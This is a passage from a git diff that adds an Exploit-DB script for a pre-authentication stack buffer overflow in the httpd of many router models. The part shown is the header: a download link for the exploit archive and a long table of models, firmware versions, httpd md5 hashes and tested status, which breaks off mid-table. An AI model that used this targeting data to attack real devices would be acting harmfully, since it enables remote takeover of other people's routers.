diff --git a/exploits/hardware/webapps/48588.py b/exploits/hardware/webapps/48588.py new file mode 100755 index 000000000..881822ade --- /dev/null +++ b/exploits/hardware/webapps/48588.py @@ -0,0 +1,3670 @@ +# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48588.zip +# +# Exploits a pre-authentication memcpy based stack buffer overflow vulnerability +# in httpd on several devices and versions: +# +# Device Version httpd md5sum Exploit status +# AC1450 V1.0.0.36_10.0.17 c105a629d55d3f7b29d6b88e2cc6ff3a Untested +# AC1450 V1.0.0.34_10.0.16 b01fa2155dbe3d37c0d244f2a258b797 Untested +# AC1450 V1.0.0.22_1.0.10 8327b4ccf3c3ea1281f5beb932f308bb Untested +# AC1450 V1.0.0.14_1.0.6 a199bd85a19fbfe360e967c889fb0a83 Untested +# AC1450 V1.0.0.8_1.0.4 c1f64b91722efa50452d6842a5e97f77 Untested +# AC1450 V1.0.0.6_1.0.3 1b043477b16d5bbd2be3d4b7c4430953 Untested +# D6220 V1.0.0.52_1.0.52 4c63e0a531ddf60310faf99702226c37 Untested +# D6220 V1.0.0.48_1.0.48 2efa4dfdb0901ffe4b99555e2ddeca32 Untested +# D6220 V1.0.0.46_1.0.46 2911f178060efcda3644be4bc7f25249 Untested +# D6220 V1.0.0.44_1.0.44 3ea0dbb8e22d0e4daf3f12d5bb26ab64 Untested +# D6220 V1.0.0.40_1.0.40 ef47f7085976c65890991eb67bbd31f7 Untested +# D6220 V1.0.0.36_1.0.36 06c1b6ff9bac3e5c583f71f8cb63bd3a Untested +# D6220 V1.0.0.34_1.0.34 9a1fcd70a952b63ea874a826793e11ba Untested +# D6220 V1.0.0.32_1.0.32 5f9b38b2e4afcff3117f3f4d1bc454f4 Untested +# D6220 V1.1.0.28_1.0.28 5fa7890b766cbd6233043a601bdc990c Untested +# D6220 V1.0.0.24_1.0.24 1d8cfa4843dd9c4f1b1360beca080a81 Untested +# D6220 V1.0.0.22_1.0.22 3d1916d41b6e1e728238e5def8723b3e Untested +# D6220 V1.0.0.16_1.0.16 d5d19a4e7ba57850e4c09a01766cde3a Untested +# D6300 V1.0.0.102_1.0.102 8dd49d875e2683e396dc67381fadd057 Tested +# D6300 V1.0.0.96_1.1.96 5caa6056af76330fc0292657f192cb69 Untested +# D6300 V1.0.0.90_1.0.90 6196e4b48c9337fd5b89f527262f81dc Tested +# D6300 V1.0.0.88-1.0.88 d65d7d6db8a240bed2c845f9ce5ef8ed Untested +# D6300 V1.0.0.76_1.0.76 b4c98cc8ff8d9cd3c4a1f65c5c5f0fde Untested +# D6300 V1.0.0.72_1.0.72 d0690f900a0fa29b38266b04de51869e Untested +# D6300 V1.0.0.42_1.0.42 e86b7593f1e6d59f49fe4948379d0d69 Untested +# D6300 V1.0.0.30_1.0.30 f3691a3179fcd7390b62398f365a4c1a Untested +# D6300 V1.0.0.24_1.0.24 33cad70c5c307950fffded6c8f64066b Untested +# D6300 V1.0.0.16_1.0.16 55f4d6ac42eff8014254eadce033faac Untested +# D6400 V1.0.0.88_1.0.88 a9a31bd500dc6542969e039283b4f44f Untested +# D6400 V1.0.0.86_1.0.86 6ef83c99c829dc7e7d0a0907d3ed71a8 Untested +# D6400 V1.0.0.82_1.0.82 33c63fc65ecba162e8acbb85bed0dda0 Untested +# D6400 V1.0.0.80_1.0.80 4d9a3533b6e7afddfb2060649e44d092 Untested +# D6400 V1.0.0.78_1.0.78 6de4a742f7c7edd7241deda0fdfd5ab4 Untested +# D6400 V1.0.0.74_1.0.74 e692a2670b133efb293ecc3e3f9c82b4 Untested +# D6400 V1.0.0.70_1.0.70 a9a0cd9ebb6e45671b03a291f79cfaf0 Untested +# D6400 V1.0.0.68_1.0.68 226c662ecbf01f524cf0c0537220d652 Untested +# D6400 V1.0.0.66_1.0.66 a1986e8fe5c270d2e8a3f9416b086a85 Untested +# D6400 V1.0.0.60_1.0.60 1f74db16784172b4e8b385149b7b730c Untested +# D6400 V1.0.0.58_1.0.58 e62704fc3cec8611afc65643564943d2 Untested +# D6400 V1.0.0.56_1.0.56 b02401e956d4160c59a2f59a31da51bc Untested +# D6400 V1.0.0.54_1.0.54 632e9d26af86341f2eea25248e298b8c Untested +# D6400 V1.0.0.52_1.0.52 c54e25d1dcd814c44ee29b26337ca140 Untested +# D6400 V1.0.0.44_1.0.44 9b5cca485ed56ade5cb3d556c8bb975b Untested +# D6400 V1.0.0.38_1.1.38 b5729e40e61563f7a1a29359e0f9c78c Untested +# D6400 V1.0.0.34_1.3.34 5628ae2ce9326a63b050e96b6aa3fb79 Untested +# D6400 V1.0.0.22_1.0.22 1dc99a4d0952f648f1dab07d5cdd2a60 Untested +# D7000v2 V1.0.0.56_1.0.1 a35f742d1d7ebf7c882fa71bc6cd4d74 Untested +# D7000v2 V1.0.0.53_1.0.2 27d115ede639511d2eda25114dd82a5b Untested +# D7000v2 V1.0.0.52_1.0.1 827190546bcae129c56334674af3f669 Untested +# D7000v2 V1.0.0.51_1.0.1 0583d3f1fd97d3616a9e1448be12ee16 Untested +# D7000v2 V1.0.0.47_1.0.1 4880a731183fce2b4d47c5064c6d7236 Untested +# D7000v2 V1.0.0.45_1.0.1 2f1bc9a39d033d10c9ae73c299353524 Untested +# D7000v2 V1.0.0.44_1.0.1 7d37548ceda1aeb2a163b9616ecfc156 Untested +# D7000v2 V1.0.0.40_1.0.1 095c32dae5741f5342f5b5aaeeac6206 Untested +# D7000v2 V1.0.0.38_1.0.1 acca219a67790af0897f8ca6f1bd949f Untested +# D8500 V1.0.3.44_1.0.1 24352845696378cb0bcef38414d5640a Untested +# D8500 V1.0.3.43_1.0.1 b71e3b8eb1aedd615aafc9311dd36886 Untested +# D8500 V1.0.3.42_1.0.1 a567caf426cc76cd11ec3c3053519c8f Untested +# D8500 V1.0.3.39_1.0.1 ff56ddb8126f5aa1dfc4d85d2eeafce4 Untested +# D8500 V1.0.3.36_1.0.1 862a04b37c61fa9cadff8754d9f3abb2 Untested +# D8500 V1.0.3.35_1.0.1 16d4ab7b3357bda7e68a79b5b9022c4d Untested +# D8500 V1.0.3.28_1.0.1 94bbb72e108e68a774746a97cc7c00c0 Untested +# D8500 V1.0.3.27_1.0.1 822427e336366dd83c018e541d1d2d4f Untested +# D8500 V1.0.3.25_1.0.1 ddd3c3f02d1286f26344265d6db1bea5 Untested +# DC112A V1.0.0.44_1.0.60 e4721b08c70fcdc3dd1048cee49c2118 Untested +# DC112A V1.0.0.30_1.0.60 c11c0fb597c234e682fbbf3f5ba00d90 Untested +# DC112A V1.0.0.24_1.0.60 b2b677dff87eab44b4972ff4948532e6 Untested +# DGN2200 V1.0.0.58_7.0.57 db21e42ca1bf1878192fa7b1627b065a Tested +# DGN2200 V1.0.0.57_7.0.57 b5e9360ea0411e3e01e2901ec1c14c61 Untested +# DGN2200 V1.0.0.55_7.0.55 5853a3a4aa466ad491b23d2a59759f67 Untested +# DGN2200 V1.0.0.52_7.0.52 8286b50e5598cf314aa15d0ce204e36c Untested +# DGN2200 V1.0.0.50_7.0.50NA 6e37ab74491954b2763bdb6214848045 Untested +# DGN2200 V1.0.0.36_7.0.36NA 3ab21af915088055bcdfc5ade0af2c2c Untested +# DGN2200 V1.0.0.36_7.0.36 75a601e25219af4cf8a0c0978a3a1d71 Untested +# DGN2200v4 V1.0.0.110_1.0.110 5a8772a24aac9d15128bf928d748c1ab Untested +# DGN2200v4 V1.0.0.108_1.0.108 2ce2f58da92aba784e0d54e2b6ddfc22 Untested +# DGN2200v4 V1.0.0.102_1.0.102 c7f92c42a258d6e8eadcb9335f25afdb Tested +# DGN2200v4 V1.0.0.98_1.0.98 ce7f84170d80046146076c0212c46b22 Untested +# DGN2200v4 V1.0.0.90_1.0.90 fad68b99a9fb2eab63cbfc6b56951d82 Untested +# DGN2200v4 V1.0.0.86_1.0.86 6a81f9a1c610a9884308d58faf36e5a7 Untested +# DGN2200v4 V1.0.0.82_1.0.82 adfeaa24b82ff7a9ae3ce4a779f32240 Untested +# DGN2200v4 V1.0.0.76_1.0.76 6ca6a23431ea41ed6fbb2c71dc6d46f8 Untested +# DGN2200v4 V1.0.0.66_1.0.66 52e293aea6c51a08be9e00aa653217e2 Untested +# DGN2200v4 V1.0.0.62_1.0.62 e88ebcec9d158dfaf557c996a6034edc Untested +# DGN2200v4 V1.0.0.58_1.0.58 a7a3412bc7608971b6a0bf47c95a56d6 Untested +# DGN2200v4 V1.0.0.46_1.0.46 603daa3cedb8c6269257416c27f1e55b Untested +# DGN2200v4 V1.0.0.24_5.0.8 a9151f0c434e6b27135b628a8cf51134 Untested +# DGN2200v4 V1.0.0.5_5.0.3 4668835a74ecab6333889d7efe171361 Untested +# DGN2200M V1.0.0.37_1.0.21WW 87fbe2fa75d8acdee8022f71629d7d79 Tested +# DGN2200M V1.0.0.35_1.0.21WW ffd47e9d882ce4f3de11df49ce7a535b Tested +# DGN2200M V1.0.0.35_1.0.21NA a8edc9e918fde432f6979af0ea77aeb6 Untested +# DGN2200M V1.0.0.33_1.0.21WW 6868b9bd17a5a47c739c0bf68dc04875 Untested +# DGN2200M V1.0.0.33_1.0.21NA d8ddd5aef65509ee95239135aa3dfc71 Untested +# DGN2200M V1.0.0.26_1.0.20WW b2942e856d5690962d7b39d585d63c2d Untested +# DGN2200M V1.0.0.24_1.0.20NA 3cf45d175d4151dadd8d2823b7222121 Untested +# DGND3700 V1.0.0.17_1.0.17 b103c87de279c008bfd9793fb808125e Untested +# DGND3700 V1.0.0.17_1.0.17NA d88c70428a629ae3a899628e4d0d7f2c Untested +# DGND3700 V1.0.0.12_1.0.12 83fabbde0e49ab07a5ab77a94a5dd0d4 Untested +# DGND3700 V1.0.0.12_1.0.12NA c6735900e4239a2a474f82fea6b2bf2f Untested +# EX3700 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested +# EX3700 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested +# EX3700 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested +# EX3700 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested +# EX3700 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested +# EX3700 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested +# EX3700 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested +# EX3700 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested +# EX3700 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested +# EX3700 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested +# EX3700 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested +# EX3700 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested +# EX3700 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested +# EX3700 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested +# EX3700 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested +# EX3700 V1.0.0.24_1.0.18 64e7797362fe0b58c4eb71758b8fa5bf Untested +# EX3700 V1.0.0.22_1.0.17 ee6f11943d1cd33f87f6fddd01917f96 Untested +# EX3800 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested +# EX3800 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested +# EX3800 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested +# EX3800 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested +# EX3800 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested +# EX3800 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested +# EX3800 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested +# EX3800 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested +# EX3800 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested +# EX3800 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested +# EX3800 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested +# EX3800 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested +# EX3800 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested +# EX3800 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested +# EX3800 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested +# EX3920 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested +# EX3920 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested +# EX3920 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested +# EX3920 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested +# EX3920 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested +# EX3920 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested +# EX3920 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested +# EX3920 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested +# EX3920 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested +# EX3920 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested +# EX3920 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested +# EX3920 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested +# EX3920 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested +# EX3920 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested +# EX3920 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested +# EX6000 V1.0.0.38_1.0.22 fa48d3a1d76f0141022b70b37a139bfb Untested +# EX6000 V1.0.0.32_1.0.18 b119eb091db312c9223291cc12608bc4 Untested +# EX6000 V1.0.0.30_1.0.17 a4988eb60c3b548c8117ff79a4e0601e Untested +# EX6000 V1.0.0.28_1.0.16 dc2b1eb141909690af81ef5690cc5912 Untested +# EX6000 V1.0.0.24_1.0.14 26077a4cdaf21b6ba0d886ea070ce8d7 Untested +# EX6000 V1.0.0.20_1.0.11 f17de59371f715b6735f0f7f8c9042e9 Untested +# EX6000 V1.0.0.10_1.0.6 e507e02386a634b092be4a5e2118e7b1 Untested +# EX6100 V1.0.2.24_1.1.134 6fde4f0259baeb6a3680fb9796b920ab Tested +# EX6100 V1.0.2.18_1.1.131 5baa9a7007dff6000bf143231e8f43ce Untested +# EX6100 V1.0.2.16_1.1.130 ee1efa975138f748fbbb21a450b956a9 Untested +# EX6100 V1.0.2.6_1.1.120 f5a6e0de947f281261b0078fa306e631 Untested +# EX6100 V1.0.1.36_1.0.114 a1b3591183bc3f75dc280f0565b2c2c9 Untested +# EX6100 V1.0.0.28_1.0.66 7a39f661c1c6e7f3168dd9e805283f12 Tested +# EX6100 V1.0.0.22_1.0.51 0bb3870ff95764b2cd600c673d81af8e Untested +# EX6120 V1.0.0.48_1.0.30 e05613c38204f66c1c8003f5ec4bde0d Untested +# EX6120 V1.0.0.46_1.0.29 46a4c7f6f054665bed444c2f536b7bf0 Untested +# EX6120 V1.0.0.42_1.0.27 ddbaa705a3e54cf361735c559e500494 Untested +# EX6120 V1.0.0.40_1.0.25 9d6ad5117207ffeda165dea3f9bb4f73 Untested +# EX6120 V1.0.0.36_1.0.23 cfdfa436b024e95d53630fd71f46c48e Untested +# EX6120 V1.0.0.32_1.0.21 58866ce4c45337157d573d904e2a4052 Untested +# EX6120 V1.0.0.30_1.0.20 817c93296f8149f6a8e41ef501918509 Untested +# EX6120 V1.0.0.28_1.0.18 feb144c0a06e2251647ff8a8bb88704b Untested +# EX6120 V1.0.0.26_1.0.16 90c4e8c9ef5c03e09989caf944a80cf3 Untested +# EX6120 V1.0.0.16_1.0.11 8f388e0ee15e32f9b7ee46d49d8e9ea2 Untested +# EX6120 V1.0.0.14_1.0.10 b6e59d1ef530c60a9ba03b8b28784cca Untested +# EX6120 V1.0.0.8_1.0.4 be69b611410dee663ca081d23e56cc9b Untested +# EX6120 V1.0.0.4_1.0.2 368cbc774798fb5233f82cb02277213b Untested +# EX6130 V1.0.0.30_1.0.17 947f815e4a2fe0678e7dd67c4b10cc99 Untested +# EX6130 V1.0.0.28_1.0.16 20db4ec9dfa72f0a3a6e5574b5663cb7 Untested +# EX6130 V1.0.0.24_1.0.14 355fe4afe7c8c017ed8048f39e3ad1e3 Untested +# EX6130 V1.0.0.22_1.0.13 6b87f60aa1ea4c6d9d44f2e8f32fc2aa Untested +# EX6130 V1.0.0.20_1.0.12 428b183f162edddacb3c4d4da0a2ecd6 Untested +# EX6130 V1.0.0.16_1.0.10 ede8953a631f5315085bfcbc50ac0534 Untested +# EX6130 V1.0.0.12_1.0.7 a1485ffd1b0afa2430c8ceb860fd12c8 Untested +# EX6150 V1.0.0.42_1.0.73 f826bb5b4850ec73c3c5522db0d9f3bb Untested +# EX6150 V1.0.0.34_1.0.69 ff4a9ac154f6dc5c58d8ee72c847d6dc Untested +# EX6150 V1.0.0.32_1.0.68 baf6e6074326d8da71b5e81d59fd2bbc Untested +# EX6150 V1.0.0.28_1.0.64 4209003e1c1c481ad66679918ccefd41 Untested +# EX6150 V1.0.0.16_1.0.58 56f1fa5cddc9a714796fd671e95d12ce Untested +# EX6150 V1.0.0.14_1.0.54 067b3adcde96e80e0bcc11ed9c846459 Untested +# EX6200 V1.0.3.90_1.1.125 884de197aa849e668ac7810561e92265 Untested +# EX6200 V1.0.3.88_1.1.123 6c183bb1b9b025cb30496dee0d9ab473 Untested +# EX6200 V1.0.3.82_1.1.117 91e4f5f7fd02adb693b79572a2f887a0 Untested +# EX6200 V1.0.3.76_1.1.111 c20025474fb29a28dc45e7b2c4566421 Untested +# EX6200 V1.0.3.74_1.1.109 c7e0ea632820e9674165190d2f7d8a57 Untested +# EX6200 V1.0.3.68_1.1.104 4fce79801c0ad403df3d627c0d3cc290 Untested +# EX6200 V1.0.1.60_1.1.98 49b23634828219d28739195b491749de Untested +# EX6200 V1.0.0.52_1.1.90 dc12bb1fb624fd72625f951d829c84be Untested +# EX6200 V1.0.0.46_1.1.70 49b158f381a21555d0c715c6e7c33d64 Untested +# EX6200 V1.0.0.42_1.1.57 4024cd22371a955861589cfdca67014d Untested +# EX6200 V1.0.0.38_1.1.52 2e6e9debfe5b93d54e18ec8f04a43480 Untested +# EX6920 V1.0.0.40_1.0.25 9d6ad5117207ffeda165dea3f9bb4f73 Untested +# EX6920 V1.0.0.36_1.0.23 cfdfa436b024e95d53630fd71f46c48e Untested +# EX6920 V1.0.0.32_1.0.21 58866ce4c45337157d573d904e2a4052 Untested +# EX6920 V1.0.0.30_1.0.20 817c93296f8149f6a8e41ef501918509 Untested +# EX6920 V1.0.0.28_1.0.18 feb144c0a06e2251647ff8a8bb88704b Untested +# EX6920 V1.0.0.26_1.0.16 90c4e8c9ef5c03e09989caf944a80cf3 Untested +# EX6920 V1.0.0.16_1.0.11 8f388e0ee15e32f9b7ee46d49d8e9ea2 Untested +# EX6920 V1.0.0.14_1.0.10 b6e59d1ef530c60a9ba03b8b28784cca Untested +# EX6920 V1.0.0.8_1.0.4 be69b611410dee663ca081d23e56cc9b Untested +# EX6920 V1.0.0.4_1.0.2 368cbc774798fb5233f82cb02277213b Untested +# EX7000 V1.0.1.84_1.0.148 769b68e697516fd40645e85266276844 Untested +# EX7000 V1.0.1.80_1.0.144 df02a32c3e8dfe22a0e10adf8f9cfa9d Untested +# EX7000 V1.0.1.78_1.0.140 cf3939b5cd5f3379084c164f0ab85ea5 Untested +# EX7000 V1.0.0.66_1.0.126 13ddf3f666fe43a4c988babf54861292 Untested +# EX7000 V1.0.0.62_1.0.122 ce6c2f13b057873db9fec0f7fdc86b5b Untested +# EX7000 V1.0.0.58_1.0.112 0b988da5188b0c2712a8414f34f68152 Untested +# EX7000 V1.0.0.56_1.0.108 40ce1aadf9810780d9b9d1cc6dd27a29 Untested +# EX7000 V1.0.0.50_1.0.102 f862e5ae2823f9187580796c90dd388b Untested +# EX7000 V1.0.0.42_1.0.94 be8bd31d14825930b8f6f9e4005b436e Untested +# EX7000 V1.0.0.38_1.0.91 04c5f1f03a3ed1491519c450e73a30df Untested +# EX7000 V1.0.0.36_1.0.88 ed80bd32dc66f080d962295130c7665c Untested +# EX7000 V1.0.0.32_1.0.84 00376a5055221c56217a93e41a5ef9c9 Untested +# EX7000 V1.0.0.30_1.0.72 e182cad2e1d3bfbc33142141958e62f5 Untested +# LG2200D V1.0.0.57_1.0.40 c788662b93484b512c97147f5e008ff9 Untested +# MBM621 V1.1.3 4ac9ddde0b40da6b2f8c9e66d7cb3560 Untested +# MBR624GU V6.01.30.64WW 367530253434926de55988a08e517828 Untested +# MBR624GU V6.01.30.61WW 7319b8c9ca2335024693e4f6ad02dfb1 Untested +# MBR624GU V6.01.30.59WW 6a78396265425537f2b15473d7f4fff6 Untested +# MBR624GU V6.01.30.59NA e4d0ec49da0956cc8b0fb7ff9461be4f Untested +# MBR624GU V6.00.30.46WW 6f984aa8e172204310226fdee94ab938 Untested +# MBR624GU V6.00.28.43WW e10b0ab92c8edc94975b345a102ef145 Untested +# MBR624GU V6.00.28.43NA 5c3e39fed6d914a836c99c397b3f1ec1 Untested +# MBR624GU V6.00.26.21WW ab6b6f1635dc27a6a93c5f172496286a Untested +# MBR624GU V6.00.22.14NA bafc32d9dc20f686f3162b263f391df6 Untested +# MBR624GU V6.00.22.12 7fe0d93833ffe7f74bc829e1054c8312 Untested +# MBR1200 V1.2.2.53 3ed99932142ee830544022ed0582e1d1 Untested +# MBR1515 V1.2.2.68 623d9ee0386c50c122fce6f3d6497c94 Untested +# MBR1516 V1.2.2.84BM cbf78bd7d7ee6c7a3a5375ae6dc07cec Untested +# MBRN3000 V1.0.0.74_2.0.12WW d496c9abe19b706d688fe11f9d48244f Untested +# MBRN3000 V1.0.0.72_2.0.12WW 0e5c04a9053070fbe09501ebd45148fb Untested +# MBRN3000 V1.0.0.72_2.0.12NA f5166bb95613b2c32d4a22b31adea533 Untested +# MBRN3000 V1.0.0.69_2.0.12WW 621647d9b23d6484c11d35ba8b28fc41 Untested +# MBRN3000 V1.0.0.69_2.0.12NA df4a8e61a3573f08e0f7e3c3a4925d45 Untested +# MBRN3000 V1.0.0.65_2.0.12WW 73f3a1d64c334e947cb5ca1f39f69301 Untested +# MBRN3000 V1.0.0.65_2.0.12NA d3ba7bcc00b3d09a72e0b1992c3fcdc4 Untested +# MBRN3000 V1.0.0.43NA cad281cfc42d26ffd88762d24074577b Untested +# MVBR1210C V1.2.0.35BM b36a65b43d84f12254ead93484e64691 Untested +# R4500 V1.0.0.4_1.0.3 eb878ea3ee999ebd2697d3a1ea6844b0 Untested +# R6200 V1.0.1.58_1.0.44 c5eb9a42ecad8deb05cdcfbba948489e Untested +# R6200 V1.0.1.56_1.0.43 b9ba700570eece0317d2d7e6f69375b1 Untested +# R6200 V1.0.1.52_1.0.41 d6fd17a8d8dec0cd65f85cf3b423b618 Untested +# R6200 V1.0.1.48_1.0.37 ba22d5de1d45e7b27ef02b54d76109c1 Untested +# R6200 V1.0.1.46_1.0.36 3b5ac031b2756daf2a22879750887491 Untested +# R6200 V1.0.0.28_1.0.24 32748ac05aed521902cdc94c79a9c7d0 Untested +# R6200 V1.0.0.18_1.0.18 b1e6175e31617dad54a2ebbdc0a0df6c Untested +# R6200v2 V1.0.3.12_10.1.11 0b0df46df490bb452369a8b2a8075039 Untested +# R6200v2 V1.0.3.10_10.1.10 8baf6ea213db77e77888566ceeb39ac1 Untested +# R6200v2 V1.0.1.20_1.0.18 e11bba1b0c9d7c882da165188d16a83b Untested +# R6200v2 V1.0.1.18_1.0.17 5b11e221cee499d20a0615461622ac79 Untested +# R6200v2 V1.0.1.16_1.0.15 b507812655353cc7ea1c95da7816f820 Untested +# R6200v2 V1.0.1.14_1.0.14 5076ce08e5bcaba94e510213e59bfff3 Untested +# R6250 V1.0.4.38_10.1.30 c84cc113aae5aa5a8e540898bda5bd5f Untested +# R6250 V1.0.4.36_10.1.30 216a9f879e881b5ae467790761c87ebd Tested +# R6250 V1.0.4.34_10.1.28 0dc8a4bab30dbbe4d8afcfcb360187ad Untested +# R6250 V1.0.4.26_10.1.23 3f1be99b50d35864d70d2aee5ecc33c6 Untested +# R6250 V1.0.4.20_10.1.20 2403a8ce4d04a584b19f0cf30f92bf56 Untested +# R6250 V1.0.4.16_10.1.18 fe6030d67f0a055903e55d405cb91e20 Untested +# R6250 V1.0.4.14_10.1.17 e0dc56338e8f16c1c38c0845291dafda Untested +# R6250 V1.0.4.12_10.1.15 0bc26be95cded31e5453d482085e723c Untested +# R6250 V1.0.4.8_10.1.13 8424c65f442d90638a6d0fc9bcf83d35 Untested +# R6250 V1.0.4.6_10.1.12 356b523cb24085686b65769e1872a583 Untested +# R6250 V1.0.4.2_10.1.10 4f119505aa1ad2c66db91ee74693442a Untested +# R6250 V1.0.3.12_10.1.8 c5ae345bf1d4b790df115ce17a1e2629 Untested +# R6250 V1.0.3.6_10.1.3 309fefe7f4c6e451adca8339107e3794 Untested +# R6250 V1.0.1.84_1.0.78 7dfdbdc609b182d6923f486f4d9c5283 Tested +# R6250 V1.0.1.82_1.0.77 d3cb80a6d4e32ac12a6ca996860179c7 Untested +# R6250 V1.0.1.80_1.0.75 cb32448faaa7dfc9031e82a80e3c6366 Untested +# R6250 V1.0.0.72_1.0.71 e8870c350aa8b1831de04528313b4597 Untested +# R6250 V1.0.0.70_1.0.70 8da51e46e4a0c8ce73b07afbcd4580f3 Untested +# R6250 V1.0.0.62_1.0.62 c086bcb2c79cf35f4369cf6a99f1c8a5 Untested +# R6300 V1.0.2.80_1.0.59 5fc46dc531417ecd3a45c7fbe23b2c99 Untested +# R6300 V1.0.2.78_1.0.58 ae302b1749a6d3462aa218c71b319ec4 Untested +# R6300 V1.0.2.76_1.0.57 a613643bbce2cec3c79f8f5896de9d9d Untested +# R6300 V1.0.2.70_1.0.50 43075b37dd29c100d412ef91bc26130e Untested +# R6300 V1.0.2.68_1.0.49 647341220a8706d9dc7c6023a7520f6e Untested +# R6300 V1.0.2.38_1.0.33 937ad68339a92c3672b205d26b29f348 Untested +# R6300 V1.0.2.36_1.0.28 9cceb9d7c494c68304babd23fda58a13 Untested +# R6300 V1.0.2.26_1.0.26 f44aba5cddc36eedebb08a74b40793db Untested +# R6300 V1.0.2.14_1.0.23 d9ce4aca0e55a0777083351958ad939c Untested +# R6300 V1.0.2.10_1.0.21 f8ae0c63ea66511e3f8e006d44236e5c Untested +# R6300 V1.0.0.90_1.0.18 87bb9b3375847616e30db052708b8442 Untested +# R6300 V1.0.0.68_1.0.16 f6276b5a3a319c423cb0bf6578098775 Untested +# R6300v2 V1.0.4.36_10.0.93 ad739a306344ba53c23dcec60b1f25ec Untested +# R6300v2 V1.0.4.34_10.0.92 e493f182ecd746d3de18df040a95211a Untested +# R6300v2 V1.0.4.32_10.0.91 0842fa456950808a355edb18795112b6 Tested +# R6300v2 V1.0.4.28_10.0.89 f4ae7abd7bff63b66f096255e4c428ca Untested +# R6300v2 V1.0.4.24_10.0.87 e05be33f9f55986c8f606be892fffc69 Untested +# R6300v2 V1.0.4.8_10.0.77 d6c9b72c67535e159ea7af739cd07926 Untested +# R6300v2 V1.0.4.6_10.0.76 a3d4fe0c8e7cd91a40724e9c7464fdf6 Untested +# R6300v2 V1.0.4.2_10.0.74 00f2196125d61b53ffd16dccaa7fde83 Untested +# R6300v2 V1.0.3.30_10.0.73 00c15e4a4cde88faaf3875914f959a2d Untested +# R6300v2 V1.0.3.28_10.0.71 cdb52e60dc2aaf5ca0944131451bad70 Untested +# R6300v2 V1.0.3.26_10.0.70 3c05bff70e44fa9458739e260d3cb647 Untested +# R6300v2 V1.0.3.22_10.0.67 6cda020fed0ae522671c15f7620c531f Untested +# R6300v2 V1.0.3.8_1.0.60 69637d313345d7d73d8f853ef2cac2b4 Tested +# R6300v2 V1.0.3.6_1.0.63CH 2871ac95aea8f1907ab2cce316a6dee9 Tested +# R6300v2 V1.0.3.2_1.0.57 e127e31093baddeee0b445dfb5b0585c Untested +# R6300v2 V1.0.2.86_1.0.51 67b4667c4f4d5a46a29bef1a705526ac Untested +# R6300v2 V1.0.2.72_1.0.46 b1edb9bbc305d22110f9231892784e3d Untested +# R6300v2 V1.0.1.72_1.0.21 907ce31e0d0c1a81f7f39b152490bb6c Untested +# R6400 V1.0.1.52_1.0.36 2d9bdc83337eaebd5b0764e4dfbf6615 Untested +# R6400 V1.0.1.50_1.0.35 82c8c7958cc51705e0388d17494a7e5b Untested +# R6400 V1.0.1.46_1.0.32 792259674ad727503af277ec1dfaacb1 Untested +# R6400 V1.0.1.44_1.0.31 eeab43c47589c596a25b8da901c0b986 Tested +# R6400 V1.0.1.42_1.0.28 f88a6ffd8b267951c1e3acf49041cb29 Untested +# R6400 V1.0.1.36_1.0.25 fbaea94679a9e93f317fa887b835aacd Tested +# R6400 V1.0.1.34_1.0.24 d272b88f46a0acd88449250bf7cb40d9 Untested +# R6400 V1.0.1.26_1.0.19 5c52c2422597a786afe6899afa51fe3f Untested +# R6400 V1.0.1.24_1.0.18 